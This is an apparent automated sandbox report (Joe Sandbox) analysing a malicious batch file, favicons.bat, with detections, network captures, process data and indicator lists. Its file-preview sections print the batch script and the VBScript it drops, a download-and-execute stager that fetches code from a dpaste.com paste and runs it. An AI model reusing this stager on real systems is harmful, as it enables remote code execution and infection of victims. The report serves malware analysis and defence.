    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1646806 Sample: favicons.bat Startdate: 24/03/2025 Architecture: WINDOWS Score: 88 21 dpaste.com 2->21 23 webapp-837091.pythonanywhere.com 2->23 27 Multi AV Scanner detection for submitted file 2->27 29 Yara detected VBS Downloader Generic 2->29 31 Sigma detected: Script Initiated Connection to Non-Local Network 2->31 35 2 other signatures 2->35 7 cmd.exe 2 2->7         started        signatures3 33 Connects to a pastebin service (likely for C&C) 21->33 process4 file5 19 C:\Windows\Temp\trickishly.vbs, ASCII 7->19 dropped 37 Command shell drops VBS files 7->37 11 wscript.exe 12 7->11         started        15 conhost.exe 7->15         started        17 timeout.exe 1 7->17         started        signatures6 process7 dnsIp8 25 webapp-837091.pythonanywhere.com 35.173.69.207, 443, 49692 AMAZON-AESUS United States 11->25 39 System process connects to network (likely due to code injection or exploit) 11->39 41 Windows Scripting host queries suspicious COM object (likely to drop second stage) 11->41 signatures9
    SourceDetectionScannerLabelLink
    favicons.bat23%VirustotalBrowse
    favicons.bat11%ReversingLabsScript-WScript.Trojan.Heuristic
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://dpaste.com/9A4PA9CZ5.txt.0%Avira URL Cloudsafe
    https://dpaste.com/9A4PA9CZ5.txtR0%Avira URL Cloudsafe
    https://dpaste.com/9A4PA9CZ5.txte0%Avira URL Cloudsafe
    https://dpaste.com/9A4PA9CZ5.txtT;P0%Avira URL Cloudsafe
    https://dpaste.b-cdn.net/static/pastebin/css/main.css0%Avira URL Cloudsafe
    https://dpaste.b-cdn.net/static/pastebin/css/skeleton.css0%Avira URL Cloudsafe
    https://dpaste.b-cdn.net/static/pastebin/site.webmanifest0%Avira URL Cloudsafe
    https://dpaste.b-cdn.net/static/pastebin/favicon-16x16.png0%Avira URL Cloudsafe
    https://dpaste.com/9A4PA9CZ5.txt0%Avira URL Cloudsafe
    https://dpaste.b-cdn.net/static/pastebin/apple-touch-icon.png0%Avira URL Cloudsafe
    https://dpaste.b-cdn.net/static/pastebin/css/normalize.css0%Avira URL Cloudsafe
    https://unpkg.cd0%Avira URL Cloudsafe
    https://dpaste.b-cdn.net/static/pastebin/favicon-32x32.png0%Avira URL Cloudsafe
    https://dpaste.com/0%Avira URL Cloudsafe
    https://dpaste.b-cdn.net/static/pastebin/favicon.ico0%Avira URL Cloudsafe

    Download Network PCAP: filteredfull

    NameIPActiveMaliciousAntivirus DetectionReputation
    webapp-837091.pythonanywhere.com
    35.173.69.207
    truetrue
      unknown
      dpaste.com
      unknown
      unknowntrue
        unknown
        NameMaliciousAntivirus DetectionReputation
        https://dpaste.com/9A4PA9CZ5.txttrue
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://dpaste.b-cdn.net/static/pastebin/site.webmanifestwscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004072874.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://dpaste.b-cdn.net/static/pastebin/css/main.csswscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004072874.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://dpaste.com/9A4PA9CZ5.txtewscript.exe, 00000002.00000002.1003911551.000001D5F21C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002947867.000001D5F21C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002687222.000001D5F21BD000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://widget.freshworks.com/widgets/2wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          https://dpaste.com/9A4PA9CZ5.txtT;Pwscript.exe, 00000002.00000002.1003911551.000001D5F21C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002947867.000001D5F21C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002687222.000001D5F21BD000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://dpaste.b-cdn.net/static/pastebin/css/skeleton.csswscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004072874.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://dpaste.b-cdn.net/static/pastebin/favicon-16x16.pngwscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004072874.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.jswscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002748699.000001D5F41F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            https://media.ethicalads.io/media/client/ethicalads.min.jswscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002748699.000001D5F41F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              https://dpaste.b-cdn.net/static/pastebin/apple-touch-icon.pngwscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004072874.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://unpkg.com/htmx.orgwscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002748699.000001D5F41F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://dpaste.com/9A4PA9CZ5.txt.wscript.exe, 00000002.00000003.1002526300.000001D5F41F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004094756.000001D5F41F4000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://fosstodon.org/wscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004072874.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://dpaste.com/9A4PA9CZ5.txtRwscript.exe, 00000002.00000002.1003911551.000001D5F21C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002947867.000001D5F21C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002687222.000001D5F21BD000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://dpaste.b-cdn.net/static/pastebin/css/normalize.csswscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004072874.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://unpkg.cdwscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://dpaste.b-cdn.net/static/pastebin/favicon.icowscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004072874.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://dpaste.com/wscript.exe, 00000002.00000003.1002808390.000001D5F21FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1003966687.000001D5F21FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002687222.000001D5F21F5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://dpaste.b-cdn.net/static/pastebin/favicon-32x32.pngwscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004072874.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://widget.freshworks.com/widgets/22000000180.jswscript.exe, 00000002.00000003.1002526300.000001D5F41E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002748699.000001D5F41F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    35.173.69.207
                    webapp-837091.pythonanywhere.comUnited States
                    14618AMAZON-AESUStrue
                    Joe Sandbox version:42.0.0 Malachite
                    Analysis ID:1646806
                    Start date and time:2025-03-24 09:47:10 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 2m 39s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:5
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:favicons.bat
                    Detection:MAL
                    Classification:mal88.spre.troj.evad.winBAT@6/2@3/1
                    EGA Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .bat
                    • Stop behavior analysis, all processes terminated
                    • Exclude process from analysis (whitelisted): dllhost.exe
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    No simulations
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    35.173.69.207YG.ps1Get hashmaliciousFormBookBrowse
                    • www.optimuminvestment.net/poqh/
                    YG.exeGet hashmaliciousFormBookBrowse
                    • www.optimuminvestment.net/poqh/
                    payment copy.exeGet hashmaliciousFormBookBrowse
                    • www.optimuminvestment.net/poqh/
                    Quotation.exeGet hashmaliciousFormBookBrowse
                    • www.optimuminvestment.net/w42a/
                    Quotation.exeGet hashmaliciousFormBookBrowse
                    • www.optimuminvestment.net/w42a/
                    Quotation.exeGet hashmaliciousFormBookBrowse
                    • www.optimuminvestment.net/w42a/
                    LRG1UB6Fqf.exeGet hashmaliciousFormBookBrowse
                    • www.aicycling.pro/2z4e/
                    vNAOY88XCO.exeGet hashmaliciousFormBookBrowse
                    • www.aicycling.pro/2z4e/
                    PO-009172433.exeGet hashmaliciousFormBookBrowse
                    • www.aicycling.pro/2z4e/
                    PO-000320188.exeGet hashmaliciousFormBookBrowse
                    • www.aicycling.pro/2z4e/
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    webapp-837091.pythonanywhere.comnicworkingskillbetterwithnicetechnology.htaGet hashmaliciousUnknownBrowse
                    • 35.173.69.207
                    bestbeautifulthingsentiretimebetterresultsgive.htaGet hashmaliciousUnknownBrowse
                    • 35.173.69.207
                    milkmaidproductsareveryniceforentiretimetogivemebest.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                    • 35.173.69.207
                    SecuriteInfo.com.decompression.bomb.470.25928.exeGet hashmaliciousStealitBrowse
                    • 35.173.69.207
                    hCWsFcDmLl.exeGet hashmaliciousLimeRATBrowse
                    • 35.173.69.207
                    #PO-39025371521.vbsGet hashmaliciousUnknownBrowse
                    • 35.173.69.207
                    Quote Request #10551 from VistaJet Ltd.vbsGet hashmaliciousUnknownBrowse
                    • 35.173.69.207
                    #PO-202264946241.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                    • 35.173.69.207
                    ServiceHub.exeGet hashmaliciousLimeRATBrowse
                    • 35.173.69.207
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    AMAZON-AESUShttps://www.powerflexweb.com/centers_redirect_log.php?idDivision=88&nameDivision=https://gamma.app/docs/SHAREPOINT-FILE-RECEIVED-v0g983lw02btb16mode=doc&idModule=m583&nameModule=myStrength&idElement=1137&nameElement=ProviderSearch&url=https://gamma.app/docs/SHAREPOINT-FILE-RECEIVED-v0g983lw02btb16Get hashmaliciousUnknownBrowse
                    • 44.208.37.67
                    Invoice Number INV132146-1.pdfGet hashmaliciousUnknownBrowse
                    • 3.219.243.226
                    https://tl.phoneky.com/android/?id=d1d149166Get hashmaliciousUnknownBrowse
                    • 3.210.72.191
                    https://waimao-north-star-mail.qiye.163.com/api/j/html?c=https%3A%2F%2F1drv.ms%2Fo%2Fs!AjlMaeoI5pi7f_GXm50IY_RD-sw%3Fe%3DEsmwj4%3Fcid%3Dsite_nqmm3LQS7c9jn-2FWvVcVpMl0NsyUA8yUApYElnaeUm2Ly_xlUzBpbEuLGet hashmaliciousUnknownBrowse
                    • 34.202.123.204
                    resgod.m68k.elfGet hashmaliciousMiraiBrowse
                    • 44.222.19.197
                    https://steigerwaldt.com/Get hashmaliciousUnknownBrowse
                    • 18.233.211.187
                    nicworkingskillbetterwithnicetechnology.htaGet hashmaliciousUnknownBrowse
                    • 35.173.69.207
                    owari.i686.elfGet hashmaliciousUnknownBrowse
                    • 54.80.227.227
                    owari.spc.elfGet hashmaliciousUnknownBrowse
                    • 18.207.39.188
                    owari.m68k.elfGet hashmaliciousUnknownBrowse
                    • 52.6.223.246
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    37f463bf4616ecd445d4a1937da06e19Pendiente De Transferencia.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                    • 35.173.69.207
                    iEGOVnrFG7.exeGet hashmaliciousUnknownBrowse
                    • 35.173.69.207
                    1F746kAKk9.exeGet hashmaliciousUnknownBrowse
                    • 35.173.69.207
                    9QzBpAFWOl.exeGet hashmaliciousUnknownBrowse
                    • 35.173.69.207
                    I82ebpwgZg.exeGet hashmaliciousUnknownBrowse
                    • 35.173.69.207
                    Payment Advice 24-03-2025.docx.docGet hashmaliciousUnknownBrowse
                    • 35.173.69.207
                    random(2).exeGet hashmaliciousVidarBrowse
                    • 35.173.69.207
                    advnrNo.exeGet hashmaliciousVidarBrowse
                    • 35.173.69.207
                    1 (1036).exeGet hashmaliciousUnknownBrowse
                    • 35.173.69.207
                    No context
                    Process:C:\Windows\System32\cmd.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):287
                    Entropy (8bit):5.03647949210045
                    Encrypted:false
                    SSDEEP:6:ZLs0IgLgmRLl0pIgCQ9vDz0LgDHCBkCLgMJgC0LSFugHVAATAW:PjPRgvDzZHCaGnVlTAW
                    MD5:32E5748C7D30285DCAED2BA56D0639C5
                    SHA1:49C557FBF1363819D2AC7F59061CE23F326172B3
                    SHA-256:925C03E8B73BBAE236A6FC713861986726BD69D4200E830E968BA910132A79FF
                    SHA-512:2EFE851B0B2DBEB994B37BAE649A0BEEAD5AA3D3B580712405944E6284B3920F70258CFA7841FB44A7EB523BE449987BFD57359B767C4AC17B2997DE9BA423A0
                    Malicious:true
                    Yara Hits:
                    • Rule: JoeSecurity_VBS_Downloader_Generic, Description: Yara detected VBS Downloader Generic, Source: C:\Windows\Temp\trickishly.vbs, Author: Joe Security
                    Reputation:low
                    Preview:Dim noncatalog, documentarist..noncatalog = "https://dpaste.com/9A4PA9CZ5.txt"..Set documentarist = CreateObject("MSXML2.XMLHTTP")..documentarist.open "GET", noncatalog, False..documentarist.send..If documentarist.Status = 200 Then.. ExecuteGlobal documentarist.responseText..End If..
                    Process:C:\Windows\System32\timeout.exe
                    File Type:ASCII text, with CRLF line terminators, with overstriking
                    Category:dropped
                    Size (bytes):53
                    Entropy (8bit):4.538872341192371
                    Encrypted:false
                    SSDEEP:3:hYFnjQGARcWmFsFJQZov:hYFWmFSQZov
                    MD5:5BFD4A973BE54A8EBC2A7F79CFCF4B6C
                    SHA1:071E9887A3B0E5500EC2116564E4DF0962946CB6
                    SHA-256:BBDCFB24BDD6DE329D8616497FE5F0C7F4644A484B825632339127F6E2CCA843
                    SHA-512:F4CD10A9977B515B39946870981E9DE599040B442AE890073B6FD04DD3086CACD6F32F19888575ECB7CC5A3A0C4408513983E6CAFCBCF5B50E140F4BDCF507D9
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview:..Waiting for 1 seconds, press CTRL+C to quit ....0..
                    File type:DOS batch file, ASCII text, with CRLF line terminators
                    Entropy (8bit):4.994661830344255
                    TrID:
                      File name:favicons.bat
                      File size:540 bytes
                      MD5:50c0f17b4addbc0d98f32424c0b55126
                      SHA1:a2f08d69be6b8ff0a7619cdf0149f5711aeb3a04
                      SHA256:26f90d8432f13b001842cf15250cfefc867b74ffd22ee0fc0afce1087e5f9f91
                      SHA512:0009e146d42d44d7a3b13790784121faf8b941de3b6066406334fb2749ffbe0bb292518a0bdba6924658855a00b319e3209039db0ca6c52d2cd5046e1467a472
                      SSDEEP:12:w7x3zseHvRielDzoCJMHCg/7BOxMVlT2V0RwKN3hl:w7xoA5+3xxOowyb
                      TLSH:B2F02B3E6A069061367B8C5894667602F95E404BB60BAC79708FC0223F51ACA95D80C1
                      File Content Preview:@echo off..setlocal..set "fugues=C:\Windows\Temp\trickishly.vbs"..>"%fugues%" (.. echo Dim noncatalog, documentarist.. echo noncatalog = "https://dpaste.com/9A4PA9CZ5.txt".. echo Set documentarist = CreateObject^("MSXML2.XMLHTTP"^).. echo docu
                      Icon Hash:9686878b929a9886

                      Download Network PCAP: filteredfull

                      • Total Packets: 15
                      • 443 (HTTPS)
                      • 53 (DNS)
                      TimestampSource PortDest PortSource IPDest IP
                      Mar 24, 2025 09:48:23.783925056 CET49692443192.168.2.835.173.69.207
                      Mar 24, 2025 09:48:23.783957958 CET4434969235.173.69.207192.168.2.8
                      Mar 24, 2025 09:48:23.784043074 CET49692443192.168.2.835.173.69.207
                      Mar 24, 2025 09:48:23.794972897 CET49692443192.168.2.835.173.69.207
                      Mar 24, 2025 09:48:23.794997931 CET4434969235.173.69.207192.168.2.8
                      Mar 24, 2025 09:48:24.010560036 CET4434969235.173.69.207192.168.2.8
                      Mar 24, 2025 09:48:24.010690928 CET49692443192.168.2.835.173.69.207
                      Mar 24, 2025 09:48:24.072506905 CET49692443192.168.2.835.173.69.207
                      Mar 24, 2025 09:48:24.072526932 CET4434969235.173.69.207192.168.2.8
                      Mar 24, 2025 09:48:24.072935104 CET4434969235.173.69.207192.168.2.8
                      Mar 24, 2025 09:48:24.073004007 CET49692443192.168.2.835.173.69.207
                      Mar 24, 2025 09:48:24.075793028 CET49692443192.168.2.835.173.69.207
                      Mar 24, 2025 09:48:24.116317034 CET4434969235.173.69.207192.168.2.8
                      Mar 24, 2025 09:48:24.272140980 CET4434969235.173.69.207192.168.2.8
                      Mar 24, 2025 09:48:24.272207975 CET4434969235.173.69.207192.168.2.8
                      Mar 24, 2025 09:48:24.272289038 CET49692443192.168.2.835.173.69.207
                      Mar 24, 2025 09:48:24.272304058 CET4434969235.173.69.207192.168.2.8
                      Mar 24, 2025 09:48:24.272351027 CET49692443192.168.2.835.173.69.207
                      Mar 24, 2025 09:48:24.272380114 CET49692443192.168.2.835.173.69.207
                      Mar 24, 2025 09:48:24.272380114 CET4434969235.173.69.207192.168.2.8
                      Mar 24, 2025 09:48:24.272428036 CET49692443192.168.2.835.173.69.207
                      Mar 24, 2025 09:48:24.275604010 CET49692443192.168.2.835.173.69.207
                      Mar 24, 2025 09:48:24.275624990 CET4434969235.173.69.207192.168.2.8
                      TimestampSource PortDest PortSource IPDest IP
                      Mar 24, 2025 09:48:20.762913942 CET5009353192.168.2.81.1.1.1
                      Mar 24, 2025 09:48:21.759799957 CET5009353192.168.2.81.1.1.1
                      Mar 24, 2025 09:48:22.759587049 CET5009353192.168.2.81.1.1.1
                      Mar 24, 2025 09:48:23.777298927 CET53500931.1.1.1192.168.2.8
                      Mar 24, 2025 09:48:23.777358055 CET53500931.1.1.1192.168.2.8
                      Mar 24, 2025 09:48:23.777394056 CET53500931.1.1.1192.168.2.8
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Mar 24, 2025 09:48:20.762913942 CET192.168.2.81.1.1.10xb480Standard query (0)dpaste.comA (IP address)IN (0x0001)false
                      Mar 24, 2025 09:48:21.759799957 CET192.168.2.81.1.1.10xb480Standard query (0)dpaste.comA (IP address)IN (0x0001)false
                      Mar 24, 2025 09:48:22.759587049 CET192.168.2.81.1.1.10xb480Standard query (0)dpaste.comA (IP address)IN (0x0001)false
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Mar 24, 2025 09:48:23.777298927 CET1.1.1.1192.168.2.80xb480No error (0)dpaste.comwebapp-837091.pythonanywhere.comCNAME (Canonical name)IN (0x0001)false
                      Mar 24, 2025 09:48:23.777298927 CET1.1.1.1192.168.2.80xb480No error (0)webapp-837091.pythonanywhere.com35.173.69.207A (IP address)IN (0x0001)false
                      Mar 24, 2025 09:48:23.777358055 CET1.1.1.1192.168.2.80xb480No error (0)dpaste.comwebapp-837091.pythonanywhere.comCNAME (Canonical name)IN (0x0001)false
                      Mar 24, 2025 09:48:23.777358055 CET1.1.1.1192.168.2.80xb480No error (0)webapp-837091.pythonanywhere.com35.173.69.207A (IP address)IN (0x0001)false
                      Mar 24, 2025 09:48:23.777394056 CET1.1.1.1192.168.2.80xb480No error (0)dpaste.comwebapp-837091.pythonanywhere.comCNAME (Canonical name)IN (0x0001)false
                      Mar 24, 2025 09:48:23.777394056 CET1.1.1.1192.168.2.80xb480No error (0)webapp-837091.pythonanywhere.com35.173.69.207A (IP address)IN (0x0001)false
                      • dpaste.com
                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.84969235.173.69.2074436844C:\Windows\System32\wscript.exe
                      TimestampBytes transferredDirectionData
                      2025-03-24 08:48:24 UTC327OUTGET /9A4PA9CZ5.txt HTTP/1.1
                      Accept: */*
                      Accept-Language: en-ch
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                      Host: dpaste.com
                      Connection: Keep-Alive
                      2025-03-24 08:48:24 UTC491INHTTP/1.1 404 Not Found
                      Date: Mon, 24 Mar 2025 08:48:24 GMT
                      Content-Type: text/html; charset=UTF-8
                      Content-Length: 4133
                      Connection: close
                      Vary: Accept-Encoding
                      Vary: Cookie, origin
                      Set-Cookie: messages=.eJwtyUEKwjAQQNGrjLPpJhgR3NWeQnBRShjipI0mGcmk9foWFP7qv3FE554qxWVWpZnRnMz5YvDOyUtmaAKPN2njA9wElLZ9LVGB9iDQJjU2BqkQJCX5_HBVrgZ6gqVyuHaWvJe1NLVJ5lhsN2R6MVCBP_SWhiMaxGn6AiupMQo:1twdTs:_Av55Wbdsul9IKStwrSRihmIjREDzhEy9nTCZNZLhGA; HttpOnly; Path=/; SameSite=Lax
                      Server: PythonAnywhere
                      2025-03-24 08:48:24 UTC4133INData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 34 31 2d 59 41 32 6f 34 6b 58 62 33 32 52 6d 79 75 43 6c 41 31 7a 41 58 5a 43 79 61 47 61 44 45 55 6a 31 51 49 63 35 62 6d 63 22 20 2f 3e 0a
                      Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="google-site-verification" content="m41-YA2o4kXb32RmyuClA1zAXZCyaGaDEUj1QIc5bmc" />


                      0246810s020406080100

                      Click to jump to process

                      0246810s0.005101520MB

                      Click to jump to process

                      • File
                      • Registry

                      Click to dive into process behavior distribution

                      Target ID:0
                      Start time:04:48:19
                      Start date:24/03/2025
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\favicons.bat" "
                      Imagebase:0x7ff6aadf0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:1
                      Start time:04:48:19
                      Start date:24/03/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
